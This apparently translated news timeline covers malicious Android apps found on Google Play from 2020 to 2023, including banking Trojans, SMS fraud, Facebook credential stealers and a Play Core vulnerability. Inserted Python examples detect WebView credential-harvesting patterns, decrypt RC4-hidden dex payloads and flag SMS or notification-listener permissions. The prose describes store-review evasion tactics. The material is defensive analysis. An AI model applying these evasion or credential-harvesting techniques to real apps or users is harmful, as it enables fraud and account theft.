2023/10/09 12:54:24

App security in the Google Play Store


2023

A Mammoth variant in which scammers push purchases through a spyware app

On October 9, 2023, the company F.A.C.C.T. announced a variant of the Mammoth fraud scheme that uses a fake Google Play store. Under the pretext of arranging delivery of goods, the scammers ask the victim to download and install, from the fake store, a mobile application of a classified-ads service, under which an Android spyware Trojan is disguised. The Trojan helps the attackers quietly debit money from the victim's account; the average theft amount is 67,000 rubles.

In the classic Mammoth scheme, fraudsters steal bank card data from victims under the pretext of a fake purchase and delivery of goods from marketplaces, rentals, real estate deals and shared travel. According to data as of the end of summer 2023, 17 active criminal groups were operating the Mammoth scheme in Russia.

In September 2023, Digital Risk Protection specialists at F.A.C.C.T. discovered a Mammoth fraud community that uses Android Trojans in its attacks. In this scheme - and this is its main danger - the attackers do not ask the victim to enter bank card data on a phishing site but instead offer to install a mobile application of a delivery ad service. The spyware hidden in it can intercept the entered bank card data and incoming SMS codes to steal money from the accounts of Russian bank customers.

The scheme itself works as follows: "workers" (community members who lure victims into downloading the malicious application) create fake ads for the sale of goods through a dedicated Telegram bot and receive in return a link to download a mobile application, an APK file.

When a buyer is found and is ready to pay for the goods, the scammers persuade the victim to continue the conversation in a messenger, so that the classifieds site does not block the message containing the link to the malicious program, and to download a mobile application through which delivery can supposedly be arranged. The seller's whole cover story rests on the claim that he is an individual entrepreneur and that, to buy goods with delivery (most often popular electronics, clothing and shoes), his clients need to use a special program.

After the victim clicks the link, a fake Google Play page opens, from which the victim must download and install a mobile application that closely copies the design and functionality of the real online platforms. There the buyer is asked to arrange delivery. At the moment of payment, the mobile Trojan intercepts the bank card data entered by the victim and sends it to a member of the criminal group (the "driver"), followed by the incoming SMS with the transfer confirmation code, in order to steal money from the victim's account.

According to F.A.C.C.T., customers of banks in both Russia and Belarus suffered from the fraudsters' actions in September 2023. In 10 days of September, using fake applications, the attackers stole almost 3,000,000 rubles under the updated Mammoth scheme, making 76 debits.

"Old tricks sooner or later stop bringing the scammers the desired income, and then they come up with new scenarios and lures and change the mechanics," said Evgeny Egorov, a leading analyst in the Digital Risk Protection department of F.A.C.C.T. "We saw how fraudsters used phishing pages generated by Telegram bots in the Mammoth scheme, then they began infecting victims with stealers that stole logins and passwords. In October 2023, one of the groups began using mobile Trojans. Some users may decide that mobile applications resembling well-known services, supposedly from an official store, are unlikely to hide any danger; this is exactly what the attackers count on."

Crypto-scam apps infiltrate the official Google and Apple stores

On February 2, 2023, it became known that cyber-bandits on Tinder lure gullible men into a cruel financial trap. The creators of high-yield investment scams known as "pig butchering" have found a way to bypass the protections of the Google Play and Apple App Store application stores. Read more here.

2022

Harly: another subscription Trojan on Google Play

Kaspersky Lab researchers have reported a new Trojan, Harly, active since 2020. According to the report, at least 190 applications with a total of 4.8 million downloads are infected with the malware, though there may be many more victims. This became known on September 27, 2022. Read more here.

SharkBot 2.25 returns to Google Play

An updated version of the SharkBot malware has returned to the Google Play Store. The malware targets the banking data of users who install seemingly harmless applications that are actually droppers for SharkBot. This became known on September 7, 2022.

According to a blog post by Fox IT, a division of the NCC Group, the two malicious apps are "Mister Phone Cleaner" and "Kylhavy Mobile Security," which together have 60,000 downloads. And while the two apps have been removed from Google Play, users who installed them are still at risk.

On August 22, 2022, Fox IT researchers discovered an updated version of SharkBot (2.25) that lets the attackers use the "logsCookie" command to steal session cookies when the victim logs into online banking systems.

According to the experts, in older versions the dropper installed SharkBot by clicking buttons in the user interface. The updated SharkBot dropper instead makes a request to the attackers' C&C server to obtain the malware APK file.


As soon as the APK file has been downloaded to the victim's device, the dropper notifies the user of an "update" and prompts them to install the downloaded file and then grant all the requested permissions.

To complicate detection, SharkBot stores its configuration encrypted using the RC4 algorithm.

During the investigation, Fox IT specialists found that a malicious campaign using SharkBot was aimed at Spain, Austria, Germany, Poland and the United States. Experts expect even more campaigns using SharkBot, as the updated version of the malware is being actively distributed among cybercriminals[1].

Two million users targeted by malicious apps on Google Play

Two million users were victims of another set of malicious applications on Google Play. The apps were discovered by Bitdefender researchers using a real-time behavior analysis method. This became known on August 19, 2022.


According to experts, the tactics of the operators of the detected applications were standard:

  • The victim is tricked into installing a malicious application passed off as a useful tool;
  • Immediately after installation, the malware changes its icon and name to make it harder to find;
  • The application begins showing intrusive ads to users via WebView; the profit from these ad impressions goes to the cybercriminals.

Experts note that all the detected applications use their own framework to download ads, so it is possible that, in addition to ads, the attackers could start downloading additional malicious software to victims' devices.

To prevent the user from quickly finding and removing the malicious applications, they replace their icon with a gear icon and rename themselves "Settings". If the victim taps the icon, they are redirected to the real settings menu. To stay even more hidden, the malicious applications remove themselves from the recent apps list.

In addition, the malware features extremely heavy code obfuscation and encryption, which prevents reverse engineering.

The list of the most famous applications (with more than 100,000 downloads) looks like this:

  • Walls light – Wallpapers Pack (gb.packlivewalls.fournatewren);
  • Big Emoji – Keyboard 5.0 (gb.blindthirty.funkeyfour);
  • Grand Wallpapers – 3D Backdrops 2.0 (gb.convenientsoftfiftyreal.threeborder);
  • Engine Wallpapers (gb.helectronsoftforty.comlivefour);
  • Stock Wallpapers (gb.fiftysubstantiated.wallsfour);
  • EffectMania – Photo Editor 2.0 (gb.actualfifty.sevenelegantvideo);
  • Art Filter – Deep Photoeffect 2.0 (gb.crediblefifty.editconvincingeight);
  • Fast Emoji Keyboard APK (de.eightylamocenko.editioneights);
  • Create Sticker for Whatsapp 2.0 (gb.convincingmomentumeightyverified.realgamequicksix);
  • Math Solver – Camera Helper 2.0 (gb.labcamerathirty.mathcamera);
  • Photopix Effects – Art Filter 2.0 (gb.mega.sixtyeffectcameravideo);
  • Led Theme – Colorful Keyboard 2.0 (gb.theme.twentythreetheme);
  • Animated Sticker Master 1.0 (am.asm.master);
  • Sleep Sounds 1.0 (com.voice.sleep.sounds);
  • Personality Charging Show 1.0 (com.charging.show);
  • Image Warp Camera;
  • GPS Location Finder (smart.ggps.lockakt).

Earlier, another set of malicious applications distributed via Google Play was reported. Seemingly harmless photo editors, virtual keyboards, wallpaper tools and editors hid malware and adware[2][3].

Dozens of malware distribution apps removed from Google Play again

Dozens of applications that distribute malware have been removed from Google Play again. This became known on July 19, 2022.

Researchers at Zscaler ThreatLabz were most interested in the spread of the infamous Joker malware targeting Android devices. Despite all of Google's security systems, the malware keeps entering the app store, using new signatures, launch methods and updated code to do so.

Joker belongs to the class of malicious applications that are used for billing and SMS fraud. In addition, the malware collects SMS messages, contact lists and information about the device.

This time, the experts found 53 applications infected with Joker. More than 300,000 users are known to have downloaded them. According to the researchers, most of the infected applications fall into two categories: communication (47%) and tools (39%). The attackers try to disguise the infected apps by using logos similar to the icons of well-known messengers and tools, in order to trick as many victims as possible.

In addition to Joker, experts found two other malware in the applications:

  • FaceStealer is an information stealer used to steal Facebook accounts (Facebook is recognized as an extremist organization and banned in Russia). With it, the hackers collected victims' account data by prompting them to log in inside the application through a fake Facebook window.
  • Coper is a banking Trojan masquerading as a QR code scanner. It performs keylogging, can intercept and send SMS messages, and gives the attackers full control over the device. Its goal is the victim's money.

Experts once again warn users that even Google Play has malicious applications and recommend carefully studying reviews of applications before installing[4].

Over 2.7 million users are victims of an unknown malware family

On July 14, 2022, it became known that over 2.7 million users were victims of Autolycos malware, which was discovered by Evina information security specialist Maxim Ingrao in 8 applications on Google Play.

As of July 2022, all malicious applications have been removed from the app store.

Below is a list of malicious applications and their number of downloads:

  • Vlog Star Video Editor - 1 million downloads;
  • Creative 3D Launcher - 1 million downloads;
  • Funny Camera - 500,000 downloads;
  • Wow Beauty Camera - 100,000 downloads;
  • Gif Emoji Keyboard - 100,000 downloads;
  • Razer Keyboard & Theme - 50,000 downloads;
  • Freeglow Camera 1.0.0 - 5,000 downloads;
  • Coco Camera v1.1 - 1,000 downloads.

Although Ingrao reported them in June 2021, Google removed the malicious applications only 6 months after the specialist's report.

Once on the victim's device, Autolycos runs in the background, trying to remain unnoticed. For example, the malware navigates to various URLs in a remote browser and then includes the result in HTTP requests, instead of using WebView. In addition, when installed on the device, Autolycos requests permission to read SMS messages.

The Autolycos operators are known to have run numerous advertising campaigns on social networks to promote their malicious applications. For Razer Keyboard & Theme alone, Ingrao counted 74 advertising campaigns on Facebook (recognized as an extremist organization and banned in Russia)[5].

More than 200 Android apps from Google Play distribute Facestealer spyware

More than 200 Android applications distributing the Facestealer spyware have been found on Google Play. This became known on May 18, 2022.

Of the 200 applications, 42 are disguised as VPN services, 20 as video editors and 13 as photo editors.

"Like Joker, another piece of mobile malware, Facestealer often changes its code, generating many variants. Since its discovery, the spyware has been constantly besieging Google Play," Trend Micro information security experts said.

In addition to account data, they also steal Facebook cookies (Facebook is recognized as an extremist organization and banned in Russia) and personally identifiable information associated with the victims' accounts.

In addition, Trend Micro has discovered 40 malicious cryptominers that force users to watch ads and pay for subscriptions.

Some fake cryptocurrency apps, such as Cryptomining Farm Your own Coin, have gone even further and are trying to steal private keys and mnemonic phrases used to restore access to cryptocurrency wallets[6].

Adding a Data Security Section

On April 28, 2022, it became known that another section, "Data Security", will appear on Google Play. In it, any user will be able to see what personal information an application receives and what data it collects and transmits. The user can then decide whether to continue using the service. The Data Security section will also indicate whether the app complies with Google Play's family policy.

"Filling out the form and providing a link to a privacy policy is mandatory for all developers, including those who do not collect any user data," Google said.

As Google representatives said, for providing incorrect information about the collection of personal data, an application risks being blocked and deleted[7] from the Play Store[8].

2021

Dr.Web found malicious applications in the Google Play directory

On July 1, 2021, the company Dr.Web announced that it had discovered malicious applications in the Google Play catalog that steal users' Facebook logins and passwords. These stealer Trojans were distributed under the guise of harmless programs, with a total of more than 5,856,010 installations.


According to the company, the experts identified a total of 10 such Trojan applications, 9 of which were present on Google Play at the time of discovery:

  • the photo editor Processing Photo (detected by Dr.Web as Android.PWS.Facebook.13). It was distributed by the developer chikumburahamilton and installed more than 500,000 times.
  • the applications App Lock Keep from developer Sheralaw Rence, App Lock Manager from developer Implummet col and Lockit Master from developer Enali mchicolo (detected as Android.PWS.Facebook.13), which let users restrict access to Android devices and the software installed on them. They were downloaded at least 50,000, 10 and 5,000 times respectively.
  • the Android device optimization utility Ruby Cleaner from developer SNT.rbcl, with more than 100,000 downloads (detected as Android.PWS.Facebook.13).
  • the astrology apps Horoscope Daily from developer HscopeDaily momo and Horoscope Pi from developer Talleyr Shauna (detected as Android.PWS.Facebook.13). The first was installed over 100,000 times, the second more than 1,000 times.
  • the fitness app Inwell Fitness (detected as Android.PWS.Facebook.14) from developer Reuben Germaine, installed over 100,000 times.
  • the image editor PIP Photo, distributed by developer Lillians. Different versions of this program are detected as Android.PWS.Facebook.17 and Android.PWS.Facebook.18. This application has more than 5,000,000 downloads.

After Dr.Web specialists contacted Google, some of these malicious programs were removed from Google Play, but as of July 2021, some were still available for download.

In addition, while studying these stealers, an earlier modification was discovered, distributed through Google Play under the guise of the EditorPhotoPip photo editor; it had already been removed from the catalog but was still available on app aggregator sites. It was added to the Dr.Web virus database as Android.PWS.Facebook.15. Android.PWS.Facebook.13, Android.PWS.Facebook.14 and Android.PWS.Facebook.15 are native Android applications, while Android.PWS.Facebook.17 and Android.PWS.Facebook.18 use the Flutter cross-platform framework. Despite this, they can be considered modifications of one Trojan, since they use the same configuration file format and the same JavaScript scripts to steal data.

The applications were fully functional, which was supposed to weaken the vigilance of potential victims. At the same time, to access all their functions, as well as allegedly to disable ads, users were invited to log into their Facebook account. Advertising inside some programs was indeed present, and this technique was intended to further encourage owners of Android devices to perform the action they needed.

At the same time, the displayed form was real. The Trojans used a special mechanism to deceive their victims. Having received the necessary settings from one of the control servers after launch, they loaded the legitimate Facebook login page, facebook.com/login.php, into a WebView. JavaScript received from the attackers' server was loaded into the same WebView and directly intercepted the entered credentials. This JavaScript then passed the stolen username and password to the Trojan application through methods exposed via the JavascriptInterface annotation, after which the Trojan sent them to the attackers' server. After the victim logged into the account, the Trojans additionally stole the cookies of the current session, which were also sent to the cybercriminals.

Analysis of these malicious programs showed that they all received settings for stealing logins and passwords from Facebook accounts. However, the attackers could easily change the parameters and instruct them to load the page of any other legitimate service, or even a completely fake login form hosted on a phishing site. Thus, the Trojans could be used to steal logins and passwords for absolutely any service. The Android.PWS.Facebook.15 malware, the earlier modification, is identical to the rest but additionally writes log output in Chinese, which may hint at its origin.
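The WebView-plus-JavascriptInterface pattern described above can be triaged at source level once an APK is decompiled. The following is an added example, not Dr.Web's tooling; it scores indicators over constructed snippets of decompiled Java (hypothetical class and URL names) and treats a login URL that is absent from the source, because it arrives from a C2 config, as grounds for manual review rather than a clean bill.

```python
import re

# Source-level indicators of the pattern: JavaScript enabled, a native bridge
# registered and annotated, a login page loaded, a script injected from
# outside, and session cookies read back. Each is a regex over decompiled text.
INDICATORS = {
    "js_enabled": re.compile(r"setJavaScriptEnabled\(\s*true\s*\)"),
    "js_bridge_registered": re.compile(r"addJavascriptInterface\("),
    "js_bridge_method": re.compile(r"@JavascriptInterface"),
    "login_page_loaded": re.compile(r'loadUrl\(\s*"https?://[^"]*login[^"]*"'),
    "script_injected": re.compile(r'evaluateJavascript\(|loadUrl\(\s*"javascript:'),
    "cookies_read": re.compile(r"CookieManager\.getInstance\(\)\.getCookie\("),
}


def triage_webview_source(source: str) -> dict:
    """Return per-indicator hits, a raw score and a verdict for one source unit."""
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    bridge = hits["js_bridge_registered"] and hits["js_bridge_method"]
    harvest = hits["script_injected"] or hits["cookies_read"]
    if bridge and harvest and hits["login_page_loaded"]:
        verdict = "credential-harvest pattern"
    elif bridge and harvest:
        # The target URL may come from the control server instead of a string
        # literal (as in the samples above), so the bridge+injection combination
        # alone still goes to a human reviewer.
        verdict = "review"
    else:
        verdict = "no pattern"
    return {"hits": hits, "score": sum(hits.values()), "verdict": verdict}


# --- constructed decompiled fragments (not real apps) ---------------------
SUSPICIOUS_SOURCE = """
WebView w = findViewById(R.id.web);
w.getSettings().setJavaScriptEnabled(true);
w.addJavascriptInterface(new Bridge(), "bridge");
w.loadUrl("https://social.example/login.php");
w.evaluateJavascript(remoteScript, null);
String cookies = CookieManager.getInstance().getCookie(w.getUrl());
class Bridge { @JavascriptInterface public void onData(String s) { upload(s); } }
"""

# Same machinery, but the page to load is fetched from a remote config.
CONFIG_DRIVEN_SOURCE = """
WebView w = findViewById(R.id.web);
w.getSettings().setJavaScriptEnabled(true);
w.addJavascriptInterface(new Bridge(), "bridge");
w.loadUrl(config.getString("target"));
w.evaluateJavascript(remoteScript, null);
class Bridge { @JavascriptInterface public void onData(String s) { upload(s); } }
"""

# An ordinary help screen: JavaScript on, nothing else.
BENIGN_SOURCE = """
WebView w = findViewById(R.id.help);
w.getSettings().setJavaScriptEnabled(true);
w.loadUrl("https://help.example/faq");
"""


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SOURCE),
                       ("config-driven", CONFIG_DRIVEN_SOURCE),
                       ("benign", BENIGN_SOURCE)):
        report = triage_webview_source(src)
        print(f"{label}: {report['verdict']} (score {report['score']})")
```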

Doctor Web recommends that Android device owners install applications only from well-known and trusted developers, and pay attention to feedback from other users. Reviews do not give an absolute guarantee of safety, but they can signal a potential threat. In addition, pay attention to when and which programs ask the user to log into an account of some service. If the user is not sure the action is safe, they should refuse to continue and remove the suspicious program.

Wave of fraudulent applications recorded for users from Southwest Asia and the Arabian Peninsula

Another wave of fraudulent apps has infiltrated the Google Play store, targeting Android users in Southwest Asia and the Arabian Peninsula - there were already more than 700,000 downloads before the McAfee Mobile Research team discovered them, and began removing them with Google. McAfee announced this on April 30, 2021.


Figure 1. Infected apps on Google Play

The malware is embedded in photo editors, wallpapers, puzzles, keyboard skins and other applications. It intercepts SMS notifications and then makes unauthorized purchases. Legitimate applications go through a review process before reaching Google Play; the fraudulent applications got into the store by submitting a "clean" version of the app for review, with the malicious code injected later through an update.


Figure 2. Negative reviews on Google Play

McAfee Mobile Security identifies this threat as Android/Etinu and warns mobile users of the risk of using these applications. The McAfee Mobile Research team continues to monitor this threat and is working with Google to remove these and other malicious apps from Google Play.

The malware embedded in these applications uses dynamic code loading. The encrypted malware data appears in a folder associated with the application, under names such as "cache.bin", "settings.bin", "data.droid", or as harmless-looking .png files, as shown below.


Figure 3. Decryption process

The figure above shows the decryption process. First, the hidden malicious code in the main.apk opens the "1.png" file in the assets folder, decrypts it into "loader.dex", and then loads the modified .dex. "1.png" is encrypted with RC4 using the package name as the key. The first payload makes an HTTP POST request to the C2 server.

Interestingly, this malware uses key management servers. It queries the servers for keys, and the server returns the key in the "s" field of a JSON response. The malware also has a self-update function: when the server responds with a "URL", the content at that URL is used instead of "2.png". However, the servers do not always respond to a request or return a key.
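For an analyst who has pulled the "1.png" asset out of such an APK, the recovery step is a plain RC4 pass keyed with the package name followed by a sanity check on the dex magic; the same helper applies to the RC4-encrypted SharkBot configuration mentioned in the 2022 section. This is an added example, not McAfee's or Fox IT's code; the package name, the fake dex body and the key-server replies are constructed, and the "s"/"URL" field handling follows the description above.

```python
import json
from typing import Optional

# Every classes.dex starts with "dex", a newline, a 3-digit version and a NUL.
DEX_MAGIC_PREFIX = b"dex\n"


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). RC4 is symmetric: one call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def looks_like_dex(blob: bytes) -> bool:
    """Plausibility check on a decrypted asset: dex magic plus the NUL at offset 7."""
    return len(blob) >= 8 and blob[:4] == DEX_MAGIC_PREFIX and blob[7] == 0


def decrypt_png_asset(encrypted_asset: bytes, package_name: str) -> Optional[bytes]:
    """Recover the dex hidden in a "1.png"-style asset that was RC4-encrypted
    with the app's package name as key. Returns None when the output does not
    look like a dex, i.e. the key guess was wrong."""
    plain = rc4_crypt(package_name.encode("utf-8"), encrypted_asset)
    return plain if looks_like_dex(plain) else None


def parse_key_server_reply(body: str) -> dict:
    """Interpret a key-server JSON reply: the RC4 key travels in "s", and a
    "URL" field replaces the second-stage asset "2.png". Both are optional,
    matching the observation that the servers do not always return a key."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        doc = {}
    if not isinstance(doc, dict):
        doc = {}
    key = doc.get("s")
    url = doc.get("URL")
    return {
        "key": key.encode("utf-8") if isinstance(key, str) and key else None,
        "next_stage": url if isinstance(url, str) and url else "2.png",
    }


# --- constructed sample: a fake dex encrypted under a made-up package name ---
SAMPLE_PACKAGE = "com.example.photo.fx"                      # hypothetical
SAMPLE_DEX = b"dex\n035\0" + b"\x00" * 24 + b"constructed dex body"
SAMPLE_ENCRYPTED_PNG = rc4_crypt(SAMPLE_PACKAGE.encode("utf-8"), SAMPLE_DEX)


if __name__ == "__main__":
    recovered = decrypt_png_asset(SAMPLE_ENCRYPTED_PNG, SAMPLE_PACKAGE)
    print("dex recovered with package-name key:", recovered is not None)
    print("wrong key:", decrypt_png_asset(SAMPLE_ENCRYPTED_PNG, "com.other.app"))
    print(parse_key_server_reply('{"s": "k3y"}'))
    print(parse_key_server_reply('{"URL": "http://example.invalid/next"}'))
```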


Figure 4. Updated payload response

As always, the most malicious functions appear at the final stage. The malware hijacks the notification listener to steal incoming SMS messages, as the Android Joker malware does, without holding the permission to read SMS. The malware then passes the notification object down the chain to the final stage. When the notification comes from the default SMS package, the message is finally exfiltrated through the WebView JavaScript interface.


Figure 5. Notification Delivery Scheme

The researchers came to the conclusion that fraudsters could receive information about the user's communication operator, phone number, SMS messages, IP address, country, etc.


Figure 6. Data breach

McAfee expects threats that abuse the notification listening feature to continue to evolve. The McAfee Mobile Research team continues to monitor these threats and protect customers by analyzing potential malware and working with app stores to remove it. It is nonetheless important to pay special attention to applications that request permissions related to SMS or to listening to notifications. Legitimate apps for editing photos or setting wallpapers simply won't ask for them, because they are not needed to run them.
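The check recommended above, an app whose purpose does not justify SMS or notification access, can be automated over a decoded AndroidManifest.xml. The following is an added example rather than McAfee's tooling; it uses constructed manifests with hypothetical package names and assumes the manifest has already been decoded from binary AXML to plain XML (for instance with apktool).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
LISTENER_BIND_PERMISSION = "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
LISTENER_ACTION = "android.service.notification.NotificationListenerService"
SMS_PERMISSIONS = {
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS",
}


def _android_attr(element, name):
    """Read an android:-namespaced attribute such as android:name."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def triage_manifest(manifest_xml: str) -> dict:
    """Flag the two capabilities singled out above: a NotificationListenerService
    (which sees every notification, SMS included, without READ_SMS) and direct
    SMS permissions. Returns what was found so a reviewer can weigh it against
    the app's stated purpose."""
    root = ET.fromstring(manifest_xml)
    requested = {_android_attr(p, "name") for p in root.iter("uses-permission")}
    listeners = []
    for service in root.iter("service"):
        bound = _android_attr(service, "permission") == LISTENER_BIND_PERMISSION
        filtered = any(_android_attr(a, "name") == LISTENER_ACTION
                       for a in service.iter("action"))
        if bound or filtered:
            listeners.append(_android_attr(service, "name"))
    sms = sorted(requested & SMS_PERMISSIONS)
    findings = []
    if listeners:
        findings.append("notification listener: " + ", ".join(listeners))
    if sms:
        findings.append("SMS permissions: " + ", ".join(sms))
    return {
        "package": root.get("package"),
        "notification_listeners": listeners,
        "sms_permissions": sms,
        "findings": findings,
        "needs_review": bool(findings),
    }


# --- constructed manifests (hypothetical packages, not real apps) -----------
SUSPICIOUS_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.photo.filters">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:label="Photo Filters">
    <activity android:name=".MainActivity"/>
    <service android:name=".SyncService"
        android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
      <intent-filter>
        <action android:name="android.service.notification.NotificationListenerService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

BENIGN_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.wallpapers">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Wallpapers">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>"""


if __name__ == "__main__":
    for manifest in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        report = triage_manifest(manifest)
        print(report["package"], "->", report["findings"] or "nothing notable")
```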

Avast detected fraudulent apps on Google Play

On March 25, 2021, Avast, a digital security and protection solutions company, announced the discovery of more than 200 fleeceware applications in the App Store and Google Play. Read more here.

Detection of malware that allows access to banking applications

On March 12, 2021, Check Point announced that its Check Point Research division had discovered a dropper in the Google Play Store: malware created to deliver other malicious software to the victim's device. "Clast82", as the researchers named it, launches malware that gives the hacker access to the victim's banking applications and full control of the smartphone. The researchers found Clast82 in 10 "useful" apps, such as those offering VPN or screen recording functions.

Clast82 installs the AlienBot Banker banking Trojan on the victim's smartphone, which can bypass the two-factor authentication of banking applications. Clast82 is also equipped with a mobile remote access Trojan (MRAT), which allows downloading applications and controlling the victim's smartphone through TeamViewer.

How Clast82 uses third-party resources to bypass Google's security mechanisms:

  • Firebase (a Google service) as the platform for communication with the C&C (command and control) server. During the Clast82 review period on Google Play, the hacker changed the configuration on the C&C side via Firebase and "disabled" Clast82's malicious behavior while Google was checking the application.
  • GitHub as a third-party hosting platform for downloading payloads. For each application published on Google Play, the hacker created a new developer account and a repository in the GitHub account, which allowed distributing payloads to devices with the malicious applications installed.


On January 28, 2021, Check Point Research reported the finding to Google. On February 9, the company confirmed that all apps infected with Clast82 had been removed from Google Play.

"The method the hacker chose is very inventive, but it raises great concerns for us: the attacker managed to bypass the security mechanisms of Google Play using publicly available third-party resources, in this case GitHub and Firebase accounts. The victims were confident they were downloading useful apps from the official Android store, but instead got a dangerous Trojan targeting banking apps," says Aviran Hazum, a mobile threat researcher at Check Point. "The mechanisms that malware uses to stealthily bypass security systems prove the need to install additional solutions to protect mobile devices. Regular in-store app validation is not enough, because an attacker can easily change the malware's behavior using third-party resources."

2020

Not all applications have fixed the CVE-2020-8913 vulnerability

Check Point Software Technologies researchers have confirmed that applications in the Google Play Store are still exposed to the known vulnerability CVE-2020-8913, which means that hundreds of millions of Android users are at significant risk. This became known on December 4, 2020. The flaw was first reported in late August by Oversecured researchers. Using it, an attacker can inject malicious code into vulnerable applications, gaining access to the resources of the host application. As a result, a hacker can gain access to confidential data from other applications on the device.

The issue is rooted in the Play Core library, which lets developers download updates and add feature modules to Android apps. The vulnerability makes it possible to add executable modules to any application that uses the library. If an attacker gets a malicious application onto the victim's device, he can then steal the victim's personal information: logins, passwords, financial data, email.

Developers need to update applications as quickly as possible

Google acknowledged and fixed the bug on April 6, 2020, rating its severity 8.8 out of 10. However, to fully eliminate the threat, developers had to incorporate the patch into their applications. Check Point researchers randomly selected several apps to see who had actually implemented the fix provided by Google.

Researchers find vulnerable apps

In September 2020, 13% of the Google Play applications analyzed by Check Point specialists used the Play Core library, and 8% of them were running vulnerable versions. These Android apps were still vulnerable:

  • Viber
  • Booking
  • Cisco Teams
  • Yango Pro (taximeter), Moovit (maps and navigation)
  • Grindr, OKCupid, Bumble (dating apps)
  • Edge (browser)
  • Xrecorder, PowerDirector (utilities)

The researchers notified the developers of all these applications about the vulnerability and the need to update the library version. Further tests showed that Viber and Booking had made the necessary corrections following Check Point's notice.

"We estimate that hundreds of millions of Android users are at risk," says Aviran Hazum, mobile research manager at Check Point Software Technologies. "While Google has implemented the patch, many apps still use legacy Play Core libraries. The CVE-2020-8913 vulnerability is very dangerous. If a malicious application exploits this flaw, it can access the same data as the vulnerable program. If a cybercriminal injects code into social media applications, he will be able to spy on victims; if he injects code into instant messengers, he will gain access to all messages. The possibilities of attack here are limited only by the imagination of the intruders."

"The corresponding CVE-2020-8913 vulnerability does not exist in the latest versions of Play Core."

Avast: HiddenAds Trojan found on Google Play Store in 47 apps that mimic games

On June 26, 2020, it became known that Avast, a digital security and protection solutions company, had discovered 47 game applications in the Google Play Store that belong to the HiddenAds family of Trojans.


Avast has already informed Google Play Store representatives about the applications found, but as of June 26, 2020, some of them were still available in the Google Play store. Google's investigation into these apps is ongoing. Applications of the HiddenAds Trojan family masquerade as safe and useful applications but actually display intrusive ads outside the applications themselves. In total, the applications found were downloaded more than 15 million times.

The Avast team was able to detect this campaign using its automated apklab.io detection platform, starting from a previous HiddenAds campaign recently found on the Google Play Store. The researchers compared the activities, features and network traffic of these applications.

Such applications can hide their icons on an infected device and intrusively display ads; this is the key feature of the HiddenAds family of Trojans. Seven of the apps can open a browser on the smartphone to display additional ads. Even when a user uninstalls an app from the device, the ads keep being shown. The apps offer poor gameplay and have low ratings, with users complaining about constant advertising.

"Campaigns such as HiddenAds can enter the official Google Play Store by hiding their true purpose or by slowly introducing malicious functions once already downloaded to the device. Such advertising campaigns are difficult to prevent, since the attackers use one-time developer accounts for each application," says Jakub Vavra, threat analyst at Avast. "While Google is a trusted store and regularly removes malicious apps, users still need to remain vigilant. When downloading applications to your devices, it is important to look for obvious signs of a bad application, for example negative reviews, requests for a large number of permissions, and so on."

Below are the 20 most downloaded apps:

  • Draw Color by Number - 1,000,000
  • Skate Board - New - 1,000,000
  • Find Hidden Differences - 1,000,000
  • Shoot Master - 1,000,000
  • Stacking Guys - 1,000,000
  • Disc Go! - 1,000,000
  • Spot Hidden Differences - 500,000
  • Dancing Run - Color Ball Run - 500,000
  • Find 5 Differences - 500,000
  • Joy Woodworker - 500,000
  • Throw Master - 500,000
  • Throw into Space - 500,000
  • Divide it - Cut & Slice Game - 500,000
  • Tony Shoot - NEW - 500,000
  • Assassin Legend - 500,000
  • Flip King - 500,000
  • Save Your Boy - 500,000
  • Assassin Hunter 2020 - 500,000
  • Stealing Run - 500,000
  • Fly Skater 2020 - 500,000

Trojan found creating fake app reviews on Google Play

On January 10, 2020, Kaspersky Lab announced the discovery of a Trojan with which attackers distribute numerous ads for applications, install various apps on devices without their owners' knowledge, and leave fake reviews on Google Play on the owners' behalf. Read more here.

Removing more than 1,700 applications infected with Bread malware

On January 10, 2020, it became known that Google specialists had described their successful effort to combat the Bread malware, also known as Joker. Over the preceding three years, the company removed more than 1,700 applications infected with various versions of this malware from the Play Store.


As reported, while most malware operators give up as soon as Google detects their apps, the Bread operators persisted: for more than three years they released updated versions of their programs every week.

Google reported on its blog:

"At one point, criminals used almost every technique of disguise and protection circumvention, trying to go unnoticed. At different times, we found three or more active variants of the malware using different approaches or targeting different carriers. During the peak periods of the criminals' activity, we saw up to 23 different applications of this family on Google Play in one day."

According to the experts, the attackers actively exploited a gap in Google Play's review process to bypass its protective mechanisms. A tactic called "versioning" lets an operator upload a clean version of the application first and add the malicious functionality only later, through an update.

Criminals have also often used YouTube videos to direct users to malicious apps in an attempt to infect as many devices as possible. Malware operators also used fake reviews to increase the popularity of apps and hide negative reviews.

The original versions of the Bread malware targeted SMS fraud: infected devices were used to pay for products or services by sending SMS messages to premium-rate numbers.

When Google introduced stricter permission policies for Android apps that require access to SMS on the device, the criminals changed tack and switched to WAP billing fraud, in which infected devices were used to connect to payment pages over a WAP connection.[9]

2019

About 90% of Russian popular Android applications transfer personal data to third parties

